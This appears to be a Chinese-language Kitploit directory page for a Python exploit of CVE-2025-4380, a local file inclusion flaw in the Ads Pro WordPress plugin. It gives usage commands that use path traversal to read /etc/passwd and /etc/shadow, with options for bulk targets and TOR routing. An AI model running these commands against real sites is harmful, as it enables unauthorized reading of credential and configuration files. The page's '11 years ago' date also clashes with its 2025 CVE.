Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4380 — 针对CVE-2025-4380的Python利用程序,这是一个存在于Ads Pro WordPress插件中的本地文件包含漏洞。支持单个和批量目标扫描,并带有代理支持。 | Kitploit
工具/GitHubGitHub/r0otk3r/cve-2025-4380
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubr0otk3r/cve-2025-4380

CVE-2025-4380

针对CVE-2025-4380的Python利用程序,这是一个存在于Ads Pro WordPress插件中的本地文件包含漏洞。支持单个和批量目标扫描,并带有代理支持。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4380 - Ads Pro 插件 <= 4.89 - 本地文件包含 (LFI) 利用工具

描述

此 Python 利用工具针对 WordPress 的 Ads Pro 插件 ≤ 4.89,该插件存在通过 bsa_preview_callback AJAX 操作的 本地文件包含 (LFI) 漏洞。

未认证的攻击者可利用此漏洞读取服务器文件系统中的任意文件,包括敏感文件,如 /etc/passwd、wp-config.php 等。


利用工具特性

  • 利用 CVE-2025-4380 LFI 漏洞。
  • 支持单个目标或批量利用。
  • 可选择将输出保存到文件。
  • 支持 HTTP 代理或 TOR 路由。
  • 具备重试机制以提高可靠性。

使用方法

单个目标

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd

多个目标(批量扫描)

root@kitploit:~
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow

将输出保存到文件

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt

使用代理(例如 Burp、TOR)

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080

参数


示例

Screenshot_2025-07-20_18_42_08

Burpsuite 请求/响应

Screenshot_2025-07-20_18_42_45 Screenshot_2025-07-20_18_42_57

漏洞参考

  • CVE-2025-4380

  • Ads Pro 插件 <= 4.89 - 通过 bsa_preview_callback 中的 bsa_template 导致的本地文件包含

⚠️ 免责声明

此利用工具仅用于教育目的和授权的安全测试。


官方频道

  • YouTube @rootctf
  • X @r0otk3r
下载工具
参数描述必填
-u, --url目标 URL(例如 http://target.com)可选
-l, --list包含目标 URL 列表的文件可选
-p, --path要包含的文件路径(例如 ../../etc/passwd)是
-o, --output保存结果的输出文件可选
--proxy代理(例如 http://127.0.0.1:8080)可选